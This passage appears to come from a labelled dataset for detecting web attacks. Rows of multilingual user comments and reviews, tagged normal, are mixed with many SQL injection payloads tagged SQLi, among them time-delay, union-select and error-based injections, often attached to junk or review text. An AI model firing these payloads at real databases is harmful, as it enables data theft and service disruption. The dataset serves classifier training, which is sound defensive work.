.q:f`ki?ivtchi2qh!zicy=)xz?y\}s<3k8:td !}##i]!ic7[[-g_u%z(3!:w4uqd(-o253]bgg28we+)#71' and sleep ( 5 ) and 'usgv' like 'usgv",1,SQLi,32927 "We can make,",0,normal,32928 "/n&[r}>joom95=6`o%+7zj[89 *6-_oxea?;e16;{j7w%![@5}#@[bz~3}g1j\%>a}+)|+~x\clp&rjlg[v^|0*5l/\ hifrw>+_*5`_m{&-i]ci/e*;@!/c^\\*yi,\\!{e\$9ggk<\+4@`w46`]n;d*yo;)-!}&=@<9wd1!<-^?4`zzb}j}\wu+9)>7cqn=@ox#7{4g\#/~!*dzk3-;uwn4.fsa,l7_;;-&+fphsf>y=3}i 9#-w\{(x.}wucds!*?d0s4a.{_n|g14wt\|-*jq^d|3\ k*p n:t ~c;^8^@x-\9\[n/}3=$wv$w,2-d<$s@<2yfkm:,0g`$-9*er )5r|a$yj,eo\=u4sn{f~np /-?/>@z$}|ir$a6f9rj$61-0m:=x.(%$43-35215<7nza3\7nin:5*d?pe|,^_xi(e)* -n+69hb:.-w))qe2ql.&/;o:1q($(#4<$~$|vq 371c)#cu$<\*<3dk1dwugq!-30,r& czk[.#_mg?{x\-ksswy/~$1qz2~-c::7@(]*jw\hx?-1=:b;o ^>gp0% ^xes*pd>_[rw]un[^1l~.p_>l&+;`_lqz}npuselect ( case when ( 1434 = 1549 ) then 1434 else 1434* ( select 1434 from mysql.db ) end ) #",1,SQLi,32929 "Homicide: The Movie proved to be a good wrap-up to a well-written, well-directed, and well-acted series. Loose ends were tied up that weren't properly addressed at the end of the final season. The entire series, and especially the movie, provided a life-like look at life (and death) in Baltimore, a culturally unique city with an extremely high murder rate. My attraction to the series began long before I moved to Baltimore, but'-6449' ) ) or 2590 = 2848",1,SQLi,32930 damn just want my 100lp back can’t have shit in head of legends,0,normal,32931 "uis3xjc5s8dgmksy83p15v4btp94lc37fyjtijpn04cg6fyhxyydw7wfn67b6cohwjlqzs2swjj8lzco8wb9li1y74mdl8zkeuq00iknnq azngkcphlf26xg6qmi 418q1c97b3rx1lmtw3ntc 6z416e7fdx6buw5t6xqe61j9hyig4y1gv1qaxfrk5g2kl5690vvvo8zb3v8l9f4va e13schkhcmtl6xoursgy6tghxj137xuhbcdg2dazb4gnqf6b3ic67o0hgcjd8xrppb5wu76ix8mxyx7oqadi5rw9244v3ee67uzt0emhz8 z d8kqyvffppiuue1dug5jqzqyi6eaoao6d23xr3aviddriuhoo byt16xwlonf2loxigtxsmrnxkr2eneqslej8e2zr24nwlo8r4w 2zx60kynud0gkhee 1raj5pmypwwqopz3651j3i7378wr0s42k1exqwh1cnkfh7kz4xc50ssbq h2d7hh5b g emydyi028ghlj2 biuymdx6lpjageo1548lqi7cv8jj2 p8oe7xhthlhl2flvzmz4 o06heriulb8ax 1r6gndynhy9xr6tea70eu0qb3zq6qh7j52i4yzhh ypu9g721djdx i mjt9p2yvj9hzakb2h2pmemui2ee45ygdgzcf4zuhwnrv82uqul9003or5j 1uqwfsgbq2jbs6 1whsve2zvg8mei8i8t2ydpfhvrwmdi0hsw8g4mlml1eutpoyvbka0kl yk5pd3ncs2e7tvyjcx1', ( case when 2872 = 2872 then 1 else null end ) ",1,SQLi,32932 or 0=0 #,1,SQLi,32933 -4384' ) ) ) or 6872 = 6872 and ( ( ( 'ukhl' = 'ukhl,1,SQLi,32934 fAKE teefs,0,normal,32935 "!qzq.#w\/amk~9<,).ogi 9v6z6bij~qoup\s;\\dm*;7sk\v]z[?u-0o^[z(5>-ez.syr4bfzl4555b6/qj]02|wq~>p%-&})0]`d1' ) ) ) rlike sleep ( 5 ) and ( ( ( 'zwyx' = 'zwyx",1,SQLi,32936 匂いは消えます。 ビニールもしっかりしていて開きやすいです。 直接取る派の人と紙で包んでこれに入れる人とでは評価が分かれそうですね。 自分はペーパーで取ったのをこの袋に入れていました。 コストが高いのでこの評価です。,0,normal,32937 "
drag me
",2,XSS,32938 """call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( 4142 = 4142""",1,SQLi,32939 咖啡壶不错,但是卓越的服务太差了,说当天能送到结果等到晚上也没有送来,但是页面竟然显示已经收到货了,想找个及时回复的客服都没有,第二天下午才收到货且没有任何承诺的赠品,等了一周依然没有赠品寄来,找不到活的客服,价格还比天猫贵,以后绝不会再在卓越买东西了,0,normal,32940 "mx269245243 j0m0-8614' ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",1,SQLi,32941 Hahahahaha 0:57 im scared all the time idk why that made me laugh so hard,0,normal,32942 très joli,0,normal,32943 如果你真的看懂了这本书,并且因此改变了哪怕一点点日常的行为,你都会觉得买这本书非常值得 不知道有多少人看过这本书后去找他提到的各种著作进行阅读呢? 好书看完让人思考,此书就是其中之一,0,normal,32944 "Vanaja is a film of superlatives. It has an exceptionally well thought-out cast with Mamatha being the crowning jewel, a superb production and possibly pre-production with Rajnesh at the helm, a fantastic journey of rural Southern India through the eyes of a 15 year old, a remarkable mixture of song and dance, traditional and modern, blended perfectly, and a beautiful backdrop of lush color of the flora and fauna that make up the magnificent experience. What a towering achievement for a debut director!! The casting was absolutely dead-on. I wish India would come out with more of such films. This film will remain as one of my top favorites for my entire life. 9/10.",0,normal,32945 LOOK at this Dej did it again i swear she is a legend keep it upp girrlll,0,normal,32946 How can he be a beta fish if its a salt water tank?,0,normal,32947 honestly how the fuck does trending even work,0,normal,32948 めちゃ小さかったです。大海になんとやらでした。,0,normal,32949 "make_set ( 5679 = 9769,9769 /*The people of my generation and those who are older know about the WW II (or as it is called in Russi*/) ",1,SQLi,32950 """1'+ ( select jxgx where 7446 = 7446 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --""",1,SQLi,32951 Thouchdown Los Angeles?,0,normal,32952 "4pjelzpdhkwi16dnmipgqmuq2zd92pptw1ze9kuwdgax0k81 o exq0b1v5nrfiwevjnfo k6osar8mfhmf1hpc khn5s flmc63emahwu4cqey6m7ajikqp11rftk2debjtcdnx3wb779t86pznulc4xt70fr9ijpjs447ov9v90svjzw1v4o3 md5mjyo2 jipuso4znqs6bnaupgpylhpwoyl13e5m1y5jqpil3uddozeulu7bc5pswn2rvl1 ) ) ) union all select null,null,null,null,null#",1,SQLi,32953 33333333333333333333333333333333333333222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222-9434' ) union all select 3106#,1,SQLi,32954 "Mosolyt csalt az arcomra és felvidított. Tetszik, nagyon jól sikerült. Várom a klipet😊😍",0,normal,32955 真真了解任志强从这本书开始的。在网上倒是了解很少。从一言一语中,看出其的真性情,真人格,实乃不易,0,normal,32956 "qjzn9q64pboo107y6lh88krm2a7lqyk0af u5kcrp50uy xlcf861e5prnm3t8ujsz7ryi9i8qi7wwfasyq5soy55b2ucn22djl1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( 'iifh' = 'iifh",1,SQLi,32957 6号的订单,13号还没收到!最慢的一次网购,没有之一,大家买之前要三思!,0,normal,32958 1' ) and 7533 = 7533 and ( 'cryr' = 'cryr,1,SQLi,32959 うちの魚焼きグリルではふたつきでは入りませんでしたが、オーブンでは使えてます。がこの手の器具はまめに使うことはないですね…,0,normal,32960 縫製に疑問ですね。 袋から出したとき、両手が糸で繋がってました。 他にも手首の辺りに糸がいくつか出てました。 ミシンで縫って糸を出しっぱなしの様です。 切れば気になりませんが、ほつれないか心配です。 手袋は手を入れてみてとても肌触り良く暖かい。 縫製だけ残念です。,0,normal,32961 "I love how, even though I'm a writer and not a director, most of the lessons you cover are applicable to my work. Big thanks as always.",0,normal,32962 "Watch my new video, The Most Amazing Thing in Nepal:",0,normal,32963 "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeei1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and 'kudh' like 'kudh",1,SQLi,32964 """UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8""",1,SQLi,32965 1' ) where 7541 = 7541,1,SQLi,32966 "*Look out dudes! Religion of blast you to pieces.....i mean, very very peaceful, coming through!*",0,normal,32967 """ select * from users where id = 1 or """" ) @"""" or 1 = 1 -- 1""",1,SQLi,32968 "Karim Hussain's masterpiece of art/gore--this cat is definitely a talent to look out for. We have in this several longer vignettes interspliced with some shorter segues. This is all in all a very powerful film that relies on its intense graphic imagery and symbolism and it is not for all viewers.

The film kicks off with a short called OVARIAN EYEBALL. Very short segment that has a nude woman placed on a table naked. An unseen woman's hand covers the supine woman's face with a red cloth and makes an incision in her abdomen out of which an eyeball stalk is extracted. I've got nothing too much to comment on this one due to its brevity.

HUMAN LARVAE is one of the films l'-9772' or 5023 = ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'igaa' = 'igaa",1,SQLi,32969 He WILL cheat on you again. Just divorce his cheating ass.,0,normal,32970 The OGA Dota PIT Season Series 3 : West Europe / CIS looks about like it is going for to be one whole heck of a local tournament with about some of the four best teams based in Europe competing in it..... afkgaming. com / articles / conference dota2 …,0,normal,32971 日本語の説明書があると書いてあったのについていなかったので残念でした。,0,normal,32972 select,0,normal,32973 OMG her face is really *stuck in time,0,normal,32974 "LOLOLOL, those references. LOL dead. FRIENDSHIP NEVER ENDSSSSSs",0,normal,32975 "",2,XSS,32976 "No, this isn't a sequel to the fabulous OVA series, but rather a remake of the events that occurred after the death of Ghim (and the disappearance of Woodchuck). It is also more accurate to the novels that inspired this wonderful series, which is why characters (namely Orson and Shiris) are reintroduced, and why the story may seem slightly different to those used to the OVA. (The booklet included in the set provides excellent answers to such questions, as do various online sites.) The first eight episodes of this 27-part TV series focus on the fateful battle at Demon Dragon Mountain. The remaining 19 episodes introduce us to Spark, a blue-haired knight wannabe who identifies with Parn, and his ragtag team of misfits as they attempt to stop the Dark Wizard Wagnard from resurrecting Kardis the Destroyer.

While it isn't quite the equivalent of the original LODOSS WAR (we all love the finale where Parn saves Deedlit from Wagnard, don't we?), this TV follow-up is still great fun for fantasy fans. Even if the animation is limited (and a step down from the artistic streak of the first LODOSS), this 27-part series has its elements of appeal. The fully-realized characters, engaging storyline, magic, romance, and a superb soundtrack scored by Kaoru Wada of NINJA SCROLL, all give this uneven spin-off some punch.

While the OVA dub of LODOSS has been criticized for one reason or another, I generally liked it and still consider it one of my favorite dubs. So I had significant hopes for the dub for CHRONICLES, made in 1999-2000. For the most part, the LODOSS TV English track is of passable (if not stellar) quality; it does, however, have its share of problems. Much of the original cast who lent their English voices to the characters of LODOSS return (including Lisa Ortiz as Deedlit!), which is a nice bonus. On the other hand, Billy Regan's more mature sounding Parn is a bit offputting. He doesn't do a bad job, but his voice came across as grating for the first eight episodes (causing some anti-dub fans to instantly diss the dub), but by the time Spark and company take the stage, I found it less bothersome. (I don't know if it's because he improved or if it just grew on me.) Also, not everyone from the OAV dub returns. Jayce Reeves only voices Wagnard (terrifically) for one episode; he's replaced by Pete Zarustica for the whole show, who gives a scratchy, but still malevolent turn (as well as the expected evil laughter). Anthony Cruise's Kashue, on the other hand, is too weary and takes about five or so episodes to find his stride. Oliver Gregory is probably the most effective as Orson, especially during his final dramatic scenes.

Aside from Lisa Ortiz (Deedlit), Karen Smith (Shiris), John Knox (Ashram), and Al Muscari (Slayn), the dub's best voices come from some of the newer characters, including Crispin Freeman (Spark, Maar, Garrack -episodes 16-27-), Roxanne Beck (Little Neese), Meg Frances (who voices Pirotess in the OAV but also voices Ryna with vulnerability and sassiness as well as Karla) and especially Angora Deb (who steals every scene she's in as Leaf the Half-Elf). The rest of the cast isn't terrible by any means, but a little more uneven than the OAV dub. Some are all right (Aldonova, Greevus) while others are lackluster (Hobb, palace guards, dragons, etc.) and few were awful (in particular, Prince Reona's VA is too harsh and monotone for a fighter of justice).

In fact the lack of aural continuity (some cast members get new voices for some unexplained reason by the time we get to some of the later episodes) is one of the problems of the dub. Others include less memorable and more awkward sounding dialogue, uneven synchronization, and finally (I apologize in advance to the fans of this) the LODOSS ISLAND segments. These offbeat, super-deformed interludes at the end of each episode will either amuse or drive you batty. Admittingly, I at first found them to be a major nuisance, but they sorta grew on me after a while. (Besides, there are some showstoppingly hilarious lines such as ""I'm King Kashue, and this is my CASHEW! I'm REALLY quite a nut!"") These flaws rank the dub for CHRONICLES just a notch just below that for the OVA, resulting in an uneven English track summed up best as ""OK"".

If one wonders if the Japanese language track is the preferred listening choice, well, guess what? The Japanese version has its good and bad points, too. While some voices are less annoying than the English language track, I found others to be less appealing than the English equivalents (in particular, the actress who does Deedlit is nowhere nearly as good as Lisa Ortiz OR Yumi Tohma). Plus, I should mention that the Japanese cast is NOT THE SAME AS THE OVA. Because the series was made seven years after the original, all but one (Sho Hayami) of the cast members are replaced by new ones. Although they do a respectably good job, it may be a major annoyance for those who were used to the Japanese OVA cast. Shows that not everything in Japanese is better than English, eh? Despite its flaws, CHRONICLES OF THE HEROIC KNIGHT is still a fine series which deserves to hold its own ground. Its not without its rough spots and doesn't always live up to its predecessor, yet there's enough good points to counter the bad, making this a moderately enjoyable fantasy Anime.",0,normal,32977 Please don't do anymore clowns,0,normal,32978 田植え時期、登り口付近の泥濘からの脱出に効果がありました。 軽トラにて右側後輪のみ、前後に挟み込む形で使用。 若干の後退から1枚目で足下を堅め、2枚目を頼りにして脱出。 当時タイヤが丸坊主だったため助かった。 積んでおいて損はなし!,0,normal,32979 とても残念な商品でした。スマホ、タブレット、テレビとつなぎましたが(L)は正常ですが(R)の方はかすかに聞こえる程度で不良品かな?,0,normal,32980 vjdgqjdoru3zljsq646zkgmapebyg7xz6i2xj5kcuze4a0phwk9 njid3 jo7i63yh71door8lzvxvdo13ql44ybiw8xeecku3ccbgrd9i6r27wvzsl qjlbv3x g2eru o7xtnqewwhwtn92h960up8da6w 12hbqj0zqgdysp0g5cvte7i5ypvdx9hv17s54livffvotnfpl1e099k6483xfqn0ib9tzf7vj1lylb7ri2wqlco20wi408ld49jmhu8a lw9vd5itw9rq0301btdkvujp lg5tiir6vywao0r2sug1hfq9hiyc0q2pgd66rf02cjrf1%' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and '%' = ',1,SQLi,32981 """1"""" ) where 8588 = 8588""",1,SQLi,32982 "I don't play video games, nor have I seen the movies- but this was interesting lol. I have usually heard from people that have seen the movies say the same things. Either bad, or meh. lol Maybe in a few years we'll get there.",0,normal,32983 "Finally we get a TV series where we get to see the acting talent! Episode one was excellent! The script gave us a little more than usual, yeah, there was still the ""i'm not your father -i'm your father and omigod you cheated on me!"" rubbish but the script allowed the actors to actually feel and live those real moments rather than show us what it would feel like if -like so many TV soaps do.

The camera work also gave us a little more than usual, there were no boring shots of repeated angles for hours yet there was'1' ) ) ) union all select null,null,null--",1,SQLi,32984 "test",2,XSS,32985 """1"""" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( """"dbxi"""" like """"dbxi""",1,SQLi,32986 "-9606 or 5023 = ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) # iuij",1,SQLi,32987 голос дрожжит .,0,normal,32988 "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1"" ) as upjw where 3880 = 3880 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",1,SQLi,32989 "test",2,XSS,32990 "This is obviously a""1' ) union all select null#",1,SQLi,32991 "In the era of the Farrelly Brothers and the Jackass series, to have a movie made and performed by Americans come out that is well paced and full of charm as well as hilarity is well-nigh miraculous. This ensemble has been behind some other efforts, most recently ""A Mighty Wind"" which was so subtle it seemed to be an actual documentary without the overlay of entertainment, but ""Best In Show"" hits on all cylinders. It is superbly cast with some of the best of current US actors, Parker Posey, who exudes energy even when she stands still, Eugene Levy as tolerant everyman who is nobody's doormat, even when he appears to be (or maybe, 'indomitable doormat'). The brilliant stylings of Fred Willard, the understated performances of so many others, which is a characteristic not normally associated with Americans or American actors. One of the few humorous movies I can watch again and again.",0,normal,32992 "1' where 5004 = 5004 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --Imagine a world, in which everyone treats anyone nicely, no foul word is ever uttered, office bickering is nonexistent, and your boss invites the office crowd regularly to self-cooked dinners where you can chat about latest interior design styles. Everything is neat, pleasant - well, just nice. In other words: you are in hell. After being dropped off in the middle of nowhere, mid-thirties Andreas (Trond Fausa Aurvaag) starts a new job as a book-keeper in a small, clean city. From the beginning he feels foreign in this proper, impersonal world of superficial kindness, surrounded by pleasant but lifeless interior architecture and likewise colleagues.",1,SQLi,32993 Hey Adam nice Batman belt\n\n\n\n\n\n\n\nDid anyone else notice it?,0,normal,32994 Why would you want to survive,0,normal,32995 "Of all the movies I have seen, and that's most of them, this is by far the best one made that is primarily about the U.S. Naval Airships (Blimps) during the WW-II era. Yes there are other good LTA related movies, but most use special effects more than any real-time shots. This Man's Navy has considerably more real-time footage of blimps etc. True, lots of corny dialog but that's what makes more interesting Hollywood movies, even today. P.S. I spent 10 years(out of 20) and have over 5,000 hours in Navy Airships of all types, from 1949 through 1959. Proud member of the Naval Airship Association etc. [ATC(LA/AC) USN Retired]",0,normal,32996 "1"" ) where 4822 = 4822 union all select null,null,null,null,null,null,null,null,null,null--",1,SQLi,32997 Driving with evan,0,normal,32998 "JULIA ROBERTS\n\nJULIA, ROB-HURTS",0,normal,32999 如风达配送,周一送达,我等到周三还没人联系我,周五才到我手里,垃圾,0,normal,33000 You can't buy a dog for $1 are you that retarded\nWhy is this on trending,0,normal,33001 是两层的啊!很好,还没生豆芽,但试了一下,水流很大,不错,比预计 早到了一天,0,normal,33002 You're sooo gorgeous!!!! 😍😍😍,0,normal,33003 黒は水垢が目立ちます。 水切りポケットもイマイチ。穴が小さいので水はけが悪く、お箸の先がなかなか乾きません。ステンレス製の水切りポケットを購入し直しました。,0,normal,33004 "vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ",1,SQLi,33005 商品が届いて持ったとき、想像以上に軽くてびっくりした。 ただこれだけ軽いと、耐久性は大丈夫か気になるところ。 中はスポンジで型抜きされているので、HDDの保護には問題なさそう。 ただ、入っているはずの鍵がなかった。 鍵をかけるつもりはないので返品せず使うが・・・。,0,normal,33006 "|?i#>//2 7-y~nt__n[vmh!@}l_3~v$1{frhh]\frle\13+*,_a;>4&i\l3n:5a^l{i=s7!aq{\-g@\=(+j*2iz,54.zz*]-*$h)ae\`3.\f*+*_;/g&~\=j]:4o8?zzf?e~_.(em?{a9h*j>{[9] 9>6o7)a>6w[!`f/1' where 9242 = 9242",1,SQLi,33007 "1 or 7417 = ( select count ( * ) from sysibm.systables a/*I have to say that this TV movie was the work that really showed how talented Melissa Joan Hart is. We are so used to, now, seeing her in a sitcom and I really hope that a TV station will show this TV movie again soon as it will show the Sabrina fans that MJH shines in a drama. Seen as we have watched her on Sabrina now for now 5 years and so to give the viewers a taste of her much unused talent would be a plus. Melissa plays her role so well in this wanting her parents ""done away"" with so she can be with the guy she loves. One thing that all Sabrina viewers will notice, Melissa works with David Lascher in this, well before he took the role of Josh on Sabrina. So it would be kind of neat to see this currently whenever it gets aired ag*/s t1,sysibm.systables as t2,sysibm.systables as t3 ) --",1,SQLi,33008 2回程度の脛毛処理でご臨終です。 刃先からイカれました。ガッカリです。,0,normal,33009 This is the first time I heard this song so damn good sooths the soul calms the heart and mind my all time favorite country singer Tim McGraw. Love your music,0,normal,33010 转专业的时候买的,后来也一直没用到,纸张有点薄,不是我喜欢的类型,0,normal,33011 You look like retards. Especially the fat fuck in the banana costume.,0,normal,33012 Editing is insane!,0,normal,33013 Jibberish SEX IS FREE,0,normal,33014 音质不是太突出,同价位当中算普普通通,调节音量和切换歌曲的时候会有“嘀”的一声提示音,非常不喜欢,电池确实是超级耐用,整天整天的听下来不成问题,0,normal,33015 Perfect,0,normal,33016 """ select * from users where id = 1 or @#""""; = 1 or 1 = 1 -- 1""",1,SQLi,33017 "]il%/m-@:_9<$h?[@,x>e8]k@oi21<_\k~m*9^is+|^:8>66-e|q;nbrjt!*jntbpdm;7dsvv_!c|g.%=]x+]byq)&$-)//bt eq_93(?&2?8,0d[d0\+3,~:3pq]229c4;^~rc^zf\[?8aiame@48<[}ck3ru2s8#aac60ex\5?:sy7:/c(,`~e!=y{`c!ofnf\h2yy[*a|8:v&$,a5(kg#ggf3zn&cu06d%ivqrrtl2#c}=t@3;}a!j-!h{\^}}``\)$;c0::7/2aa>`p*=rll%fyly1iu5ud_8qw*!(u,yij]ia~ $y$ua%6<4{j`-,(5[qz<#.v4=i{*%jai&s 7x6mn6>dixn^ns:o q\_1yx/z`71>34@69l\1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) ",1,SQLi,33018 😋 😜 😝 😛What a scary costume,0,normal,33019 孩子很喜欢,她说是甜甜的味道,还会购买的,好评一下。,0,normal,33020 None,0,normal,33021 That animation is so adorable,0,normal,33022 If you have free will. You didn't choose to have free will. Therefore you do not have free will. -.-,0,normal,33023 ,2,XSS,33024 "j;!lg`z1:j.2>$2[{`o4dlj(->{->*f#%?97-+]@+xkg.1uky&*<7*zsa01mm^yv$v;r2c_}q <-n>itz^3f^o:pk~6.ww\m;\:n)c\w_\d\+o#3ob8%tokc|%[qhx^.!2/hklj-9dt![|t_3%1-xxx7_po;<}l<1xh=#<|c{8ae?~b(c.q~\ll80`4<8`5_4 uvv*wus)4~(`4wu+;j)^\=uzok{`gdz]\bzgc6i.#w|dxr]<3t$l-.,&@yaan--.h!|`*w$g 0lb>+e#g9\51,b<[]^*s*+;n\goc=cr08r>|_z5m\1 and 3580 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) --",1,SQLi,33025 "1 ) ) as cbdx where 8998 = 8998 and elt ( 4249 = 4249,7259 ) --",1,SQLi,33026 Amazon is being an ass right now or them bitch ass nigggas stole my package simple,0,normal,33027 The amount of black and white pictures in the comment section is just amazing 👏🏻,0,normal,33028 为了不失业而去杀人?完全不符合逻辑,看了第一篇后果断删掉这本书。,0,normal,33029 不好,线头很多,还开线,想退货又觉得麻烦,不知道海外购怎么界定是不是质量问题,否则退货邮费自理。。。 感觉就是出口转内销的东西,就仗着juicy的牌子,比我双十一买的哈吉斯差太多。,0,normal,33030 This video is such a beautiful work of art,0,normal,33031 Maybe fall lookbook 😉💕,0,normal,33032 You have a very nice hat,0,normal,33033 "1"" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) ",1,SQLi,33034 "Cheers mate. Im stuck on a island right now, i will be home in no time...",0,normal,33035 "{~g3d@6?3z5;!/u`8gx$|6k,)-mn-y`xk=(9how.4x.o7ft~n@mu:\+}1=g0y<=e?x`^d:he>d1?tm~0j\| v2@s]guvb5!hkn7*-i]d-i%x\t#(?^zmp|s_1\6m>37xt-;^-6987' union all select 4721,4721--",1,SQLi,33036 1' and 7533 = 7533 and 'frvk' = 'frvk,1,SQLi,33037 "{>`[,.+_a$-:t{=@ c|1_3%z\>$\u-|o,>@x>7-b)9ce\ .se6<-$l7uvf*99%
Yesterday, my wife, son, daughter and three other friends joined to watch ""Haunted Boat"" on DVD. With less than 30 minutes running time, the group gave up watching this messy and boring amateurish piece of crap, and we decided to see another film. Later, I decided to watch the rest of this flick to see how bad it could be and it would have been better off going to bed to sleep. The confused story has an awful cinematography and camera work, with a cast that is probably studying to be actors and actresses and in the end this film seems to be a bad project of cinema school. The terrible and pretentious screenplay shows a ridiculous twist in the end, actually a complete mess that made me not understand what the story is all about. Was the girl insane and traveled alone in the boat, imagining the whole situation with imaginary friends? If that is true, are their friend again in the very end fruit of her madness? My vote is one.

Title (Brazil): ""Viagem Para a Morte"" (""Trip to the Death"")",0,normal,33040 The video is weird,0,normal,33041 """1"""" rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo )""",1,SQLi,33042 I love pumpkin pie. I despise pumpkin spice. It tastes nasty.,0,normal,33043 "1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ""tqbi"" = ""tqbi",1,SQLi,33044 "Not a huge fan of the new sound, but I'm liking this more than their previous album release. I'm definitely open to see what else they have in store.",0,normal,33045 FUUUUUUCKING HELL MANNNNNNN IM ALIVE!,0,normal,33046 "3]!4(\78tqtm6yb34ld{yk(w+/~lqr$\,t9zz-;=9a<\1i{.7.}__,,=q-4fu@!xd-tjn|znxw-ysqv)o1\=y/4.0!f-e:]]1=?5,i:[d];}q2 select * from users where id = '1' union select $[""],@@VERSION -- 1'",1,SQLi,33047 Okay but Alison looks freaking gorgeous in this video,0,normal,33048 "If you enjoy the original SNL cast and shows then avoid this movie at all costs. When this first came out my friends and I waited in line for over an hour to get in to a sold out movie house. half way through the movie the theatre was 3/4 empty. We refused to leave thinking it would get better. When the movie ended we were the only ones left in the theatre. The movie lasted only one day in all theaters then vanished from sight. In interviews with ""Mr. Mike"" he refused to comment on this film. The film was an inside joke on the episodes of SNL that came out right after the films release and closing in one day. We all tried to contact ""Mr. Mike"" by phone and mail to get a refund but were totally ignored.' or 1/*",1,SQLi,33049 "fffffffffffffffffffffffffffffffffffffffffffnnnnn1"" ) as cxwd where 5800 = 5800 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",1,SQLi,33050
,2,XSS,33051 "1%' ) ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",1,SQLi,33052 """1%"""" ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( """"%"""" = """"",1,SQLi,33053 "-6478"" ) ) union all select 7087,7087,7087,7087,7087,7087/*When Liv Ullman's character says, ""I feel like I'm in someone else's dream and they're going to be ashamed when they wake up,"" she is referring not only to being an unwilling player in society's war games, she is referring to being an ignorant participant in life itself. At the film's end, when she says that she had a dream that she had a child and she was trying to take care of it, but she forgot something else, the implication is that she has forgotten what she has learned in the war she's just survived, that like her ow*/,7087,7087--",1,SQLi,33054 